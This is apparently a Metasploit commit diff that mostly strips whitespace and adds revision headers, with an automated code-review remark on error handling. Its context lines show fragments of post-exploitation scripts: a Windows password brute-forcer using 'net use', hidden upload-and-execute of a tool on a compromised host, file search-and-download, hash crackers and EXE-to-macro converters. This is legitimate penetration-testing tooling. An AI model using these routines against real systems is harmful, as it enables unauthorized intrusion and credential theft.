@@ -249,7 +249,7 @@ def srvreclkp(session,domain,dest) srout.clear end end - + end #------------------------------------------------------------------------------- #Function to print message during run diff --git a/scripts/meterpreter/prefetchtool.rb b/scripts/meterpreter/prefetchtool.rb index 2a3c4b6308..0f243fb7a9 100644 --- a/scripts/meterpreter/prefetchtool.rb +++ b/scripts/meterpreter/prefetchtool.rb @@ -1,7 +1,7 @@ # $Id$ #Meterpreter script for extracting information from windows prefetch folder #Provided by Milo at keith.lee2012[at]gmail.com -#Verion: 0.1.0 +#Verion: 0.1.0 require 'fileutils' require 'net/http' @@ -13,9 +13,9 @@ require 'digest/sha1' # Script Options @@exec_opts = Rex::Parser::Arguments.new( "-h" => [ false, "Help menu."], - "-p" => [ false, "List Installed Programs"], - "-c" => [ false, "Disable SHA1/MD5 checksum"], - "-x" => [ true, "Top x Accessed Executables (Based on Prefetch folder)"], + "-p" => [ false, "List Installed Programs"], + "-c" => [ false, "Disable SHA1/MD5 checksum"], + "-x" => [ true, "Top x Accessed Executables (Based on Prefetch folder)"], "-i" => [ false, "Perform lookup for software name"], "-l" => [ false, "Download Prefetch Folder Analysis Log"] ) @@ -27,7 +27,7 @@ def read_program_list key = @session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', KEY_READ) sfmsvals = key.enum_key sfmsvals.each do |test1| - begin + begin key2 = "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\"+test1 root_key2, base_key2 = @session.sys.registry.splitkey(key2) value1 = "DisplayName" @@ -36,7 +36,7 @@ def read_program_list v1 = open_key.query_value(value1) v2 = open_key.query_value(value2) print_status("#{v1.data}\t(Version: #{v2.data})") - rescue + rescue end end end 
@@ -46,7 +46,7 @@ def prefetch_dump(options, logging=false) lexe = File.join(Msf::Config.data_directory, "prefetch.exe") rexe = sprintf("%.5d",rand(100000)) + ".exe" rlog = sprintf("%.5d",rand(100000)) + ".txt" - + print_status("Uploading Prefetch-tool for analyzing Prefetch folder...") begin @session.fs.file.upload_file("#{@tempdir}\\#{rexe}", lexe) @@ -58,11 +58,11 @@ def prefetch_dump(options, logging=false) end begin - + if(logging) options += " --txt=#{@tempdir}\\#{rlog}" end - + r = @session.sys.process.execute("cmd.exe /c #{@tempdir}\\#{rexe} #{options} #{rlog}", nil, {'Hidden' => 'true','Channelized' => true}) while(d = r.channel.read) d.split("\n").each do |out| @@ -81,7 +81,7 @@ def prefetch_dump(options, logging=false) end sleep(0.5) if found end - + r.channel.close r.close @@ -99,7 +99,7 @@ def prefetch_dump(options, logging=false) @session.sys.process.execute("cmd.exe /c del #{@tempdir}\\#{rlog}", nil, {'Hidden' => 'true'}) end - rescue ::Interrupt; raise $! + rescue ::Interrupt; raise $! rescue ::Exception => e print_status("The following error was encountered: #{e.class} #{e}") return @@ -148,7 +148,7 @@ if !(::File.exist?(prefetch_local)) else print_status("Checking for an updated copy of prefetch.exe..") digest = Digest::SHA1.hexdigest(::File.read(prefetch_local, ::File.size(prefetch_local))) - + Net::HTTP.start("code.google.com") do |http| req = Net::HTTP::Get.new("/p/prefetch-tool/downloads/detail?name=prefetch.exe&can=2&q=") resp = http.request(req) diff --git a/scripts/meterpreter/remotewinenum.rb b/scripts/meterpreter/remotewinenum.rb index 8904fe779b..e045675071 100644 --- a/scripts/meterpreter/remotewinenum.rb +++ b/scripts/meterpreter/remotewinenum.rb @@ -4,7 +4,7 @@ # and Windows XP remote targets using native windows command wmic. #Provided by Carlos Perez at carlos_perez[at]darkoperator.com #Verion: 0.1.0 -#Note: +#Note: ################## Variable Declarations ################## session = client # Variables for Options 
@@ -65,7 +65,7 @@ def wmicexec(session,wmic,user,pass,trgt) tmp = session.fs.file.expand_path("%TEMP%") # Temporary file on windows host to store results wmicfl = tmp + "\\wmictmp#{rand(100000)}.txt" - + wmic.each do |wmi| if user == nil print_status("The commands will be ran under the credentials of #{runningas}") @@ -132,7 +132,7 @@ def headerbuid(session,target,dest) header << "OS: #{info['OS']}\n" header << "Target: #{target}\n" header << "\n\n\n" - + print_status("Saving report to #{dest}") header @@ -187,10 +187,10 @@ if helpcall == 0 and trg != "" print_status("Stopped: Running as System and no user provided for connecting to target!!") else trg != nil && helpcall != 1 - + filewrt(dest,headerbuid(session,trg,dest)) filewrt(dest,wmicexec(session,wmic,rusr,rpass,trg)) - + end elsif helpcall == 0 and trg == "" diff --git a/scripts/meterpreter/search_dwld.rb b/scripts/meterpreter/search_dwld.rb index 0748ba99b8..2ea398e4ef 100644 --- a/scripts/meterpreter/search_dwld.rb +++ b/scripts/meterpreter/search_dwld.rb @@ -26,7 +26,7 @@ def usage print_line "USAGE: run search_dwld [base directory] [filter] [pattern]" print_line print_line "filter can be a defined pattern or 'free', in which case pattern must be given" - print_line "Defined patterns:" + print_line "Defined patterns:" print_line $filters.keys.sort.collect{|k| "\t#{k}"}.join("\n") print_line print_line "Examples:" @@ -75,13 +75,13 @@ if filter == 'free' end $motif = args[2] else - $motif = $filters[filter] + $motif = $filters[filter] end if $motif.nil? raise RuntimeError.new("Unrecognized filter") end -# Search and download +# Search and download scan(basedir) diff --git a/scripts/meterpreter/winbf.rb b/scripts/meterpreter/winbf.rb index a4b06aa87d..d4e21d271d 100644 --- a/scripts/meterpreter/winbf.rb +++ b/scripts/meterpreter/winbf.rb 
@@ -65,7 +65,7 @@ def chkpolicy(session) end #-------------------------------------------------------- -# Function for brute forcing passwords using windows native tools +# Function for brute forcing passwords using windows native tools def passbf(session,passlist,target,user,opt,logfile) print_status("Running Brute force attack against #{user}") print_status("Successfull Username and Password pairs are being saved in #{logfile}") @@ -88,7 +88,7 @@ def passbf(session,passlist,target,user,opt,logfile) ::File.open(passlist, "r").each_line do |line| begin print_status("Trying #{u.chomp} #{line.chomp}") - + # Command for testing local login credentials r = session.sys.process.execute("cmd /c net use \\\\#{target} #{line.chomp} /u:#{u.chomp}", nil, {'Hidden' => true, 'Channelized' => true}) while(d = r.channel.read) @@ -96,7 +96,7 @@ def passbf(session,passlist,target,user,opt,logfile) end r.channel.close r.close - + # Checks if password is found result = output.to_s.scan(/The\scommand\scompleted\ssuccessfully/) if result.length == 1 @@ -144,10 +144,10 @@ def logme(target) # Create the log directory ::FileUtils.mkdir_p(logs) - + #logfile name dest = logs + "/" + target + filenameinfo - + dest end #-------------------------------------------------------- @@ -162,16 +162,16 @@ end when "-L" userlist = val ulopt = 1 - + when "-cp" chkpolicy(session) exit when "-p" - + passlist = val if not ::File.exists?(passlist) raise "Password File does not exists!" - end + end when "-t" target = val when "-h" @@ -189,11 +189,11 @@ end if user.length > 0 && passlist != nil && target != nil passbf(session,passlist,target,user,ulopt,logme(target)) - + elsif userlist != nil && passlist != nil && target != nil passbf(session,passlist,target,userlist,ulopt,logme(target)) - + elsif helpcall == 0 print( @@ -201,5 +201,5 @@ elsif helpcall == 0 "Usage:\n" + @@exec_opts.usage ) -end +end 
diff --git a/scripts/meterpreter/winenum.rb b/scripts/meterpreter/winenum.rb index 48fe1b7e40..f5000c2b39 100644 --- a/scripts/meterpreter/winenum.rb +++ b/scripts/meterpreter/winenum.rb @@ -265,14 +265,14 @@ def list_exec(cmdlst) r.close }) i += 1 - + else sleep(0.10) and a.delete_if {|x| not x.alive?} while not a.empty? i = 0 end end - + a.delete_if {|x| not x.alive?} while not a.empty? end #------------------------------------------------------------------------------- @@ -293,7 +293,7 @@ def wmicexec(wmiccmds= nil) print_status "\trunning command wmic #{wmi}" flname = "#{@logfol}/wmic_#{wmi.gsub(/(\W)/,"_")}.csv" r = @client.sys.process.execute("cmd.exe /c wmic /append:#{wmicfl} #{wmi} /format:csv", nil, {'Hidden' => true}) - sleep(2) + sleep(2) #Making sure that WMIC finishes before executing next WMIC command prog2check = "wmic.exe" found = 0 diff --git a/test/tests/03_range_walker_test.rb b/test/tests/03_range_walker_test.rb index 6879203443..5ffb29042a 100644 --- a/test/tests/03_range_walker_test.rb +++ b/test/tests/03_range_walker_test.rb @@ -5,13 +5,13 @@ require 'rex/socket/range_walker' describe Rex::Socket::RangeWalker do it "should have a num_ips attribute" do - walker = Rex::Socket::RangeWalker.new("") + walker = Rex::Socket::RangeWalker.new("") walker.should respond_to("num_ips") walker.should respond_to("length") walker.num_ips.should == walker.length end it "should handle single ipv6 addresses" do - walker = Rex::Socket::RangeWalker.new("::1") + walker = Rex::Socket::RangeWalker.new("::1") walker.should be_valid walker.length.should == 1 end 
@@ -102,20 +102,20 @@ describe Rex::Socket::RangeWalker do end it "should handle ipv6 cidr" do - walker = Rex::Socket::RangeWalker.new("::1/127") + walker = Rex::Socket::RangeWalker.new("::1/127") walker.should be_valid walker.length.should == 2 - walker = Rex::Socket::RangeWalker.new("::1/122") + walker = Rex::Socket::RangeWalker.new("::1/122") walker.should be_valid walker.length.should == 2 ** 6 - walker = Rex::Socket::RangeWalker.new("::1/116") + walker = Rex::Socket::RangeWalker.new("::1/116") walker.should be_valid walker.length.should == 2 ** 12 end #it "should handle ipv6 ranges" do # pending("Need to define how this should be handled") - # walker = Rex::Socket::RangeWalker.new("::1-::1:1") + # walker = Rex::Socket::RangeWalker.new("::1-::1:1") # walker.should be_valid # walker.length.should == 2 ** 16 #end diff --git a/tools/convert_31.rb b/tools/convert_31.rb index ff96cca9d0..8acac41a00 100755 --- a/tools/convert_31.rb +++ b/tools/convert_31.rb @@ -1,4 +1,8 @@ #!/usr/bin/env ruby +# +# $Id$ +# $Revision$ +# path = ARGV.shift || exit data = File.read(path) @@ -18,18 +22,18 @@ data.each_line do |line| line = "#{spaces}include Msf::#{inc.strip}\n" end end - + if(line =~ /^(\s*)class ([^\<]+)\s*<\s*(.*)/) prefix = "" spaces = $1 parent = $3 - + if(parent !~ /^Msf/) prefix = "Msf::" end line = "#{spaces}class Metasploit3 < #{prefix}#{parent.strip}\n" end - + outp += line end diff --git a/tools/exe2vba.rb b/tools/exe2vba.rb index 58107f8867..dbc4db4a1a 100755 --- a/tools/exe2vba.rb +++ b/tools/exe2vba.rb @@ -1,8 +1,12 @@ #!/usr/bin/env ruby # +# $Id$ +# # This script converts an EXE to a VBA script for Word/Excel # Credit to PriestMaster for the original C code # +# $Revision$ +# msfbase = File.symlink?(__FILE__) ? File.readlink(__FILE__) : __FILE__ $:.unshift(File.join(File.dirname(msfbase), '..', 'lib')) diff --git a/tools/exe2vbs.rb b/tools/exe2vbs.rb index db14a6eeaa..04db88a5cb 100755 --- a/tools/exe2vbs.rb +++ b/tools/exe2vbs.rb 
@@ -1,7 +1,11 @@ #!/usr/bin/env ruby # +# $Id$ +# # This script converts an EXE to a vbs script # +# $Revision$ +# msfbase = File.symlink?(__FILE__) ? File.readlink(__FILE__) : __FILE__ $:.unshift(File.join(File.dirname(msfbase), '..', 'lib')) diff --git a/tools/find_badchars.rb b/tools/find_badchars.rb index 102e195fa5..3823f03cb7 100755 --- a/tools/find_badchars.rb +++ b/tools/find_badchars.rb @@ -1,8 +1,12 @@ #!/usr/bin/env ruby # +# $Id$ +# # This script is intended to assist an exploit developer in deducing what # "bad characters" exist for a given input path to a program. # +# $Revision$ +# $:.unshift(File.join(File.dirname(__FILE__), '..', 'lib')) diff --git a/tools/halflm_second.rb b/tools/halflm_second.rb index c09f90b6fd..b78e563adc 100755 --- a/tools/halflm_second.rb +++ b/tools/halflm_second.rb @@ -1,10 +1,14 @@ #!/usr/bin/env ruby # +# $Id$ +# # This script cracks a half-lm challenge/response hash that uses a # a static challenge key. The idea is you use rainbow tables to # crack the first 7 chars and this script to complete a few remaining. # If the password is longer than 10 characters, this script will fail. # +# $Revision$ +# msfbase = File.symlink?(__FILE__) ? File.readlink(__FILE__) : __FILE__ $:.unshift(File.join(File.dirname(msfbase), '..', 'lib')) diff --git a/tools/import_webscarab.rb b/tools/import_webscarab.rb index 84ce918aef..b063c2e239 100755 --- a/tools/import_webscarab.rb +++ b/tools/import_webscarab.rb @@ -1,4 +1,8 @@ #!/usr/bin/env ruby +# +# $Id$ +# $Revision$ +# # Script which allows to import OWASP WebScarab sessions # (http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project) 
@@ -11,7 +15,7 @@ require 'sqlite3' puts "--- WMAP WebScarab Session Importer ---------------------------------------------" puts -if ARGV.length < 2 +if ARGV.length < 2 $stderr.puts("Usage: #{File.basename($0)} wescarabdirectory sqlite3database [target] [startrequest]") $stderr.puts $stderr.puts("webscarabdirectory\tThe directory where you stored the webscarab session") @@ -60,7 +64,7 @@ File.open("#{ws_directory+File::SEPARATOR}conversationlog", "r") do |log| # regulare expressions to extract the stuff that we really need # i know that the url stuff can be handeled in one request but # i am toooo lazy... - regex_conversation = /^### Conversation : (\d+)/ + regex_conversation = /^### Conversation : (\d+)/ regex_datetime = /^WHEN: (\d+)/ regex_method = /^METHOD: (\S+)/ regex_status = /^STATUS: (\d\d\d)/ 
@@ -70,47 +74,47 @@ File.open("#{ws_directory+File::SEPARATOR}conversationlog", "r") do |log| if line =~ regex_conversation then conversation_id = regex_conversation.match(line)[1] next if conversation_id.to_i < start_id - + # we don't care about scripts, commets - while (line =~ regex_datetime) == nil + while (line =~ regex_datetime) == nil line = log.gets end - + # Add a dot to the timestring so we can convert it more easily date_time = regex_datetime.match(line)[1] date_time = Time.at(date_time.insert(-4, '.').to_f) - + method = regex_method.match(log.gets)[1] - + # we don't care about COOKIES while (line =~ regex_status) == nil line = log.gets end status = regex_status.match(line)[1] - + url_matcher = regex_url.match(log.gets) - + puts "Processing (#{conversation_id}): #{url_matcher[0]}" - + ssl = url_matcher[1] == "https" host_name = url_matcher[2] port = url_matcher[3] path = url_matcher[4].chomp - query = url_matcher[5] - + query = url_matcher[5] + if host_name.match("#{target}$").nil? == true then puts("Not the selected target, skipping...") next end - + if(target_ips.has_key?(host_name)) then host = target_ips[host_name] else ip = Resolv.getaddress(host_name) target_ips[host_name] = ip host = ip - end - + end + # set the parameters in the insert query insert_statement.bind_param("host", host) insert_statement.bind_param("port", port) 
@@ -121,12 +125,12 @@ File.open("#{ws_directory+File::SEPARATOR}conversationlog", "r") do |log| insert_statement.bind_param("respcode", status) insert_statement.bind_param("created", date_time) insert_statement.bind_param("respcode", status) - + #Open the files with the requests and the responses... request_filename = "#{ws_directory+File::SEPARATOR}conversations#{File::SEPARATOR+conversation_id}-request" puts("Reading #{request_filename}") - request_file = File.open(request_filename, "rb") - + request_file = File.open(request_filename, "rb") + # Analyse the request request_header = "" request_file.gets # we don't need the return code... @@ -134,41 +138,41 @@ File.open("#{ws_directory+File::SEPARATOR}conversationlog", "r") do |log| request_header += request_line break if request_line == "\r\n" end - - + + request_body = "" while(request_line = request_file.gets) do request_body += request_line end - + insert_statement.bind_param("headers", request_header) insert_statement.bind_param("body", request_body) - - request_file.close() - + + request_file.close() + response_filename = "#{ws_directory+File::SEPARATOR}conversations#{File::SEPARATOR+conversation_id}-response" puts("Reading #{response_filename}") response_file = File.open("#{ws_directory+File::SEPARATOR}conversations#{File::SEPARATOR+conversation_id}-response", "rb") - + # scip the first line response_file.gets - + # Analyse the response response_header = "" while(response_line = response_file.gets) do response_header += response_line break if response_line == "\r\n" end - + response_body = response_file.read - + insert_statement.bind_param("resphead", response_header) insert_statement.bind_param("response", response_body) - - response_file.close() - + + response_file.close() + insert_statement.execute() - end + end end end diff --git a/tools/lm2ntcrack.rb b/tools/lm2ntcrack.rb index db3002ab65..f80a30539a 100755 --- a/tools/lm2ntcrack.rb +++ b/tools/lm2ntcrack.rb 
@@ -1,8 +1,12 @@ #!/usr/bin/env ruby # +# $Id$ +# # This script cracks a NTLM hash based on the case-insensitive LANMAN password # Credit to Yannick Hamon for the idea/perl code # +# $Revision$ +# msfbase = File.symlink?(__FILE__) ? File.readlink(__FILE__) : __FILE__ $:.unshift(File.join(File.dirname(msfbase), '..', 'lib')) diff --git a/tools/metasm_shell.rb b/tools/metasm_shell.rb index cb6704eac8..959164e4b5 100755 --- a/tools/metasm_shell.rb +++ b/tools/metasm_shell.rb @@ -1,8 +1,13 @@ #!/usr/bin/env ruby # +# $Id$ +# # This tool provides an easy way to see what opcodes are associated with # certain x86 instructions by making use of Metasm! # +# +# $Revision$ +# # This file is part of Metasm, the Ruby assembly manipulation suite # Copyright (C) 2007 Yoann GUILLOT diff --git a/tools/module_author.rb b/tools/module_author.rb index 8075e65e60..f2977838cb 100755 --- a/tools/module_author.rb +++ b/tools/module_author.rb @@ -1,5 +1,8 @@ #!/usr/bin/env ruby # +# $Id$ +# $Revision$ +# # This script lists each module by its licensing terms # @@ -10,7 +13,7 @@ require 'rex' require 'msf/ui' require 'msf/base' -Indent = ' ' +Indent = ' ' # Initialize the simplified framework instance. $framework = Msf::Simple::Framework.create @@ -47,7 +50,7 @@ $framework.nops.each_module { |name, mod| x.author.each do |r| r = r.to_s tbl << [ 'nop/' + name, r ] - names[r]||=0; names[r]+=1 + names[r]||=0; names[r]+=1 end } $framework.encoders.each_module { |name, mod| @@ -55,7 +58,7 @@ $framework.encoders.each_module { |name, mod| x.author.each do |r| r = r.to_s tbl << [ 'encoder/' + name, r ] - names[r]||=0; names[r]+=1 + names[r]||=0; names[r]+=1 end } $framework.auxiliary.each_module { |name, mod| @@ -63,7 +66,7 @@ $framework.auxiliary.each_module { |name, mod| x.author.each do |r| r = r.to_s tbl << [ 'auxiliary/' + name, r ] - names[r]||=0; names[r]+=1 + names[r]||=0; names[r]+=1 end } diff --git a/tools/module_license.rb b/tools/module_license.rb index f9a615b179..0ff8545d2e 100755 
--- a/tools/module_license.rb +++ b/tools/module_license.rb @@ -1,7 +1,11 @@ #!/usr/bin/env ruby # +# $Id$ +# # This script lists each module by its licensing terms # +# $Revision$ +# msfbase = File.symlink?(__FILE__) ? File.readlink(__FILE__) : __FILE__ $:.unshift(File.join(File.dirname(msfbase), '..', 'lib')) @@ -11,10 +15,10 @@ require 'msf/ui' require 'msf/base' def lic_short(l) - if (l.class == Array) + if (l.class == Array) l = l[0] end - + case l when MSF_LICENSE 'MSF' @@ -29,7 +33,7 @@ def lic_short(l) end end -Indent = ' ' +Indent = ' ' # Initialize the simplified framework instance. $framework = Msf::Simple::Framework.create diff --git a/tools/module_ports.rb b/tools/module_ports.rb index 2001997016..9e036b0136 100755 --- a/tools/module_ports.rb +++ b/tools/module_ports.rb @@ -1,7 +1,11 @@ #!/usr/bin/env ruby # +# $Id$ +# # This script lists each module by the default ports it uses # +# $Revision$ +# msfbase = File.symlink?(__FILE__) ? File.readlink(__FILE__) : __FILE__ $:.unshift(File.join(File.dirname(msfbase), '..', 'lib')) diff --git a/tools/module_reference.rb b/tools/module_reference.rb index 24ffa5e179..49c4aef16d 100755 --- a/tools/module_reference.rb +++ b/tools/module_reference.rb @@ -1,7 +1,11 @@ #!/usr/bin/env ruby # +# $Id$ +# # This script lists each module by its licensing terms # +# $Revision$ +# msfbase = File.symlink?(__FILE__) ? File.readlink(__FILE__) : __FILE__ $:.unshift(File.join(File.dirname(msfbase), '..', 'lib')) diff --git a/tools/module_targets.rb b/tools/module_targets.rb index 80baffda24..64236c561d 100755 --- a/tools/module_targets.rb +++ b/tools/module_targets.rb @@ -4,6 +4,8 @@ # # This script lists each module by the default ports it uses # +# $Revision$ +# msfbase = File.symlink?(__FILE__) ? File.readlink(__FILE__) : __FILE__ $:.unshift(File.join(File.dirname(msfbase), '..', 'lib')) diff --git a/tools/msf_irb_shell.rb b/tools/msf_irb_shell.rb index 0381237f7b..188f08951d 100755 --- a/tools/msf_irb_shell.rb 
+++ b/tools/msf_irb_shell.rb @@ -1,4 +1,8 @@ #!/usr/bin/env ruby +# +# $Id$ +# $Revision$ +# msfbase = File.symlink?(__FILE__) ? File.readlink(__FILE__) : __FILE__ $:.unshift(File.join(File.dirname(msfbase), '..', 'lib')) diff --git a/tools/msfcrawler.rb b/tools/msfcrawler.rb index 21883554e6..a647d1c5b0 100755 --- a/tools/msfcrawler.rb +++ b/tools/msfcrawler.rb @@ -1,8 +1,11 @@ #!/usr/bin/env ruby # -# Web Crawler. +# $Id$ +# +# Web Crawler. # # Author: et [at] metasploit.com 2010 +# $Revision$ # # @@ -18,7 +21,7 @@ begin rescue LoadError puts "Error: sqlite3-ruby not found" end - + msfbase = File.symlink?(__FILE__) ? File.readlink(__FILE__) : __FILE__ $:.unshift(File.join(File.dirname(msfbase), '..', 'lib')) @@ -34,7 +37,7 @@ $sleeptime = 0 $taketimeout = 15 # Read timeout (-1 forever) -$readtimeout = -1 +$readtimeout = -1 # Directory containing crawler modules $crawlermodulesdir = File.join(File.dirname(msfbase),"..", "data", "msfcrawler") @@ -81,13 +84,13 @@ class HttpCrawler self.ctarget = target self.cport = port self.cssl = ssl - + self.useproxy = useproxy self.proxyhost = proxyhost self.proxyport = proxyport - + self.cinipath = (inipath.nil? or inipath.empty?) ? '/' : inipath - + inireq = { 'rhost' => self.ctarget, 'rport' => self.cport, @@ -98,19 +101,19 @@ class HttpCrawler 'query' => nil, 'data' => nil } - - + + @NotViewedQueue = Rinda::TupleSpace.new @ViewedQueue = Hash.new @UriLimits = Hash.new - + insertnewpath(inireq) - + puts "Loading modules: #{$crawlermodulesdir}" load_modules puts "OK" end - + def reqtemplate(target,port,ssl) hreq = { 'rhost' => target, @@ -120,15 +123,15 @@ class HttpCrawler 'ctype' => nil, 'ssl' => ssl, 'query' => nil, - 'data' => nil + 'data' => nil } return hreq end - + def storedb(hashreq,response,dbpath) #postgres , pg gem - + db = SQLite3::Database.new(dbpath) #db = Mysql.new("127.0.0.1", username, password, databasename) until !db.transaction_active? 
@@ -136,29 +139,29 @@ class HttpCrawler #wait end #puts "db: #{db.transaction_active?}" - + #CREATE TABLE "wmap_requests" ( - # "id" INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL, - # "host" varchar(255), - # "address" varchar(16), - # "address6" varchar(255), - # "port" integer, - # "ssl" integer, - # "meth" varchar(32), - # "path" text, - # "headers" text, - # "query" text, - # "body" text, - # "respcode" varchar(16), - # "resphead" text, - # "response" text, + # "id" INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL, + # "host" varchar(255), + # "address" varchar(16), + # "address6" varchar(255), + # "port" integer, + # "ssl" integer, + # "meth" varchar(32), + # "path" text, + # "headers" text, + # "query" text, + # "body" text, + # "respcode" varchar(16), + # "resphead" text, + # "response" text, # "created_at" datetime); - + db.transaction db.execute( "insert into wmap_requests (host,address,address6,port,ssl,meth,path,headers,query,body,respcode,resphead,response,created_at,updated_at) values (?,?,?,?,?,?,?,?,?,?,?,?,?,?,?)", hashreq['rhost'], hashreq['rhost'], - hashreq['rhost'], + hashreq['rhost'], hashreq['rport'].to_i, hashreq['ssl']? 1:0, hashreq['method'], 
@@ -171,51 +174,51 @@ class HttpCrawler SQLite3::Blob.new(response.body.to_s), Time.new, Time.new - ) + ) db.commit - + db.close end - + def run i, a = 0, [] - - - + + + begin reqfilter = reqtemplate(self.ctarget,self.cport,self.cssl) - + loop do - + #### #if i <= $threadnum # a.push(Thread.new { #### - + hashreq = @NotViewedQueue.take(reqfilter, $taketimeout) - - ul = false + + ul = false if @UriLimits.include?(hashreq['uri']) and $enableul - #puts "Request #{@UriLimits[hashreq['uri']]}/#{$maxurilimit} #{hashreq['uri']}" - if @UriLimits[hashreq['uri']] >= $maxurilimit - #puts "URI LIMIT Reached: #{$maxurilimit} for uri #{hashreq['uri']}" - ul = true + #puts "Request #{@UriLimits[hashreq['uri']]}/#{$maxurilimit} #{hashreq['uri']}" + if @UriLimits[hashreq['uri']] >= $maxurilimit + #puts "URI LIMIT Reached: #{$maxurilimit} for uri #{hashreq['uri']}" + ul = true end else - @UriLimits[hashreq['uri']] = 0 + @UriLimits[hashreq['uri']] = 0 end - - if !@ViewedQueue.include?(hashsig(hashreq)) and !ul - + + if !@ViewedQueue.include?(hashsig(hashreq)) and !ul + @ViewedQueue[hashsig(hashreq)] = Time.now @UriLimits[hashreq['uri']] += 1 - + if !File.extname(hashreq['uri']).empty? and $dontcrawl.include? File.extname(hashreq['uri']) if $verbose puts "URI not crawled #{hashreq['uri']}" end - else - + else + prx = nil if self.useproxy prx = "HTTP:"+self.proxyhost.to_s+":"+self.proxyport.to_s @@ -231,33 +234,33 @@ class HttpCrawler ) sendreq(c,hashreq) - - - end + + + end else if $verbose puts "#{hashreq['uri']} already visited at #{@ViewedQueue[hashsig(hashreq)]}" end end - + #### #}) - #i += 1 + #i += 1 #else # sleep(0.01) and a.delete_if {|x| not x.alive?} while not a.empty? # i = 0 #end #### - - end + + end rescue Rinda::RequestExpiredError puts "END." return end end - + # # Modified version of load_protocols from psnuffle by Max Moser # 
@@ -266,7 +269,7 @@ class HttpCrawler if (not File.directory?(base)) raise RuntimeError,"The Crawler modules parameter is set to an invalid directory" end - + @crawlermodules = {} cmodules = Dir.new(base).entries.grep(/\.rb$/).sort cmodules.each do |n| @@ -278,7 +281,7 @@ class HttpCrawler cmod = $1 klass = m.const_get("Crawler#{cmod}") @crawlermodules[cmod.downcase] = klass.new(self) - + puts("Loaded crawler module #{cmod} from #{f}...") end rescue ::Exception => e @@ -286,43 +289,43 @@ class HttpCrawler end end end - - def sendreq(nclient,reqopts={}) - + + def sendreq(nclient,reqopts={}) + begin - + r = nclient.request_raw(reqopts) resp = nclient.send_recv(r, $readtimeout) while(resp and resp.code == 100) resp = nclient.reread_response(resp, $readtimeout) - end - + end + if resp # # Quickfix for bug packet.rb to_s line: 190 - # In case modules or crawler calls to_s on de-chunked responses + # In case modules or crawler calls to_s on de-chunked responses # resp.transfer_chunked = false if resp['Set-Cookie'] #puts "Set Cookie: #{resp['Set-Cookie']}" #puts "Storing in cookie jar for host:port #{reqopts['rhost']}:#{reqopts['rport']}" - #$cookiejar["#{reqopts['rhost']}:#{reqopts['rport']}"] = resp['Set-Cookie'] + #$cookiejar["#{reqopts['rhost']}:#{reqopts['rport']}"] = resp['Set-Cookie'] end - + if $dbs storedb(reqopts,resp,$dbpathmsf) end - + puts ">> [#{resp.code}] #{reqopts['uri']}" - + if reqopts['query'] and !reqopts['query'].empty? - puts ">>> [Q] #{reqopts['query']}" + puts ">>> [Q] #{reqopts['query']}" end - if reqopts['data'] - puts ">>> [D] #{reqopts['data']}" + if reqopts['data'] + puts ">>> [D] #{reqopts['data']}" end - + case resp.code when 200 @crawlermodules.each_key do |k| 
@@ -335,15 +338,15 @@ class HttpCrawler end insertnewpath(urltohash('GET',resp['Location'],reqopts['uri'],nil)) when 404 - puts "[404] Invalid link #{reqopts['uri']}" + puts "[404] Invalid link #{reqopts['uri']}" else puts "Unhandled #{resp.code}" - end - + end + else puts "No response" end - sleep($sleeptime) + sleep($sleeptime) rescue puts "ERROR" if $verbose @@ -360,7 +363,7 @@ class HttpCrawler hashreq['uri'] = canonicalize(hashreq['uri']) if hashreq['rhost'] == self.ctarget and hashreq['rport'] == self.cport - if !@ViewedQueue.include?(hashsig(hashreq)) + if !@ViewedQueue.include?(hashsig(hashreq)) if @NotViewedQueue.read_all(hashreq).size > 0 if $verbose puts "Already in queue to be viewed" @@ -369,9 +372,9 @@ class HttpCrawler if $verbose puts "Inserted: #{hashreq['uri']}" end - + @NotViewedQueue.write(hashreq) - end + end else if $verbose puts "#{hashreq['uri']} already visited at #{@ViewedQueue[hashsig(hashreq)]}" @@ -379,33 +382,33 @@ class HttpCrawler end end end - + # # Build a new hash for a local path # - + def urltohash(m,url,basepath,dat) # m: method # url: uri?[query] # basepath: base path/uri to determine absolute path when relative # data: body data, nil if GET and query = uri.query - + uri = URI.parse(url) uritargetssl = (uri.scheme == "https") ? true : false - + uritargethost = uri.host - if (uri.host.nil? or uri.host.empty?) + if (uri.host.nil? or uri.host.empty?) uritargethost = self.ctarget uritargetssl = self.cssl end - + uritargetport = uri.port - if (uri.port.nil?) + if (uri.port.nil?) uritargetport = self.cport end uritargetpath = uri.path - if (uri.path.nil? or uri.path.empty?) + if (uri.path.nil? or uri.path.empty?) uritargetpath = "/" end @@ -418,9 +421,9 @@ class HttpCrawler if !newp.to_s.empty? newp = File.join(oldp.dirname,newp) end - end - end - + end + end + hashreq = { 'rhost' => uritargethost, 'rport' => uritargetport, 
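Review bot: The bare `rescue` following `sleep($sleeptime)` catches every StandardError raised while sending the request or dispatching the response to crawler modules, and reports only the word `ERROR`, and only when `$verbose` is set, so a failing module or a network error leaves no usable trace. Bind the exception and print it, e.g. `rescue => e` followed by `puts "ERROR: #{e.class}: #{e.message}" if $verbose`. sendreq begins in the previous hunk and its closing `end` lies outside this one.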
@@ -435,14 +438,14 @@ class HttpCrawler if m == 'GET' and !dat.nil? hashreq['query'] = dat else - hashreq['data'] = dat + hashreq['data'] = dat end - - - + + + return hashreq end - + # Taken from http://www.ruby-forum.com/topic/140101 by Rob Biedenharn def canonicalize(uri) u = uri.kind_of?(URI) ? uri : URI.parse(uri.to_s) @@ -458,59 +461,59 @@ class HttpCrawler u.to_s end - - + + def hashsig(hashreq) hashreq.to_s end -end +end class BaseParser attr_accessor :crawler - + def initialize(c) self.crawler = c - end + end def parse(request,result) nil end - + # # Add new path (uri) to test hash queue # def insertnewpath(hashreq) self.crawler.insertnewpath(hashreq) end - + def hashsig(hashreq) self.crawler.hashsig(hashreq) end def urltohash(m,url,basepath,dat) - self.crawler.urltohash(m,url,basepath,dat) + self.crawler.urltohash(m,url,basepath,dat) end - + def targetssl self.crawler.cssl end - + def targetport self.crawler.cport end - + def targethost self.crawler.ctarget end - + def targetinipath self.crawler.cinipath end end -trap("INT") { +trap("INT") { exit() } @@ -523,13 +526,13 @@ $args = Rex::Parser::Arguments.new( "-h" => [ false, "Display this help information"], "-v" => [ false, "Verbose" ] ) - -if ARGV.length < 1 + +if ARGV.length < 1 puts("\n" + " Usage: #{$0} \n" + $args.usage) exit -end - -turl = 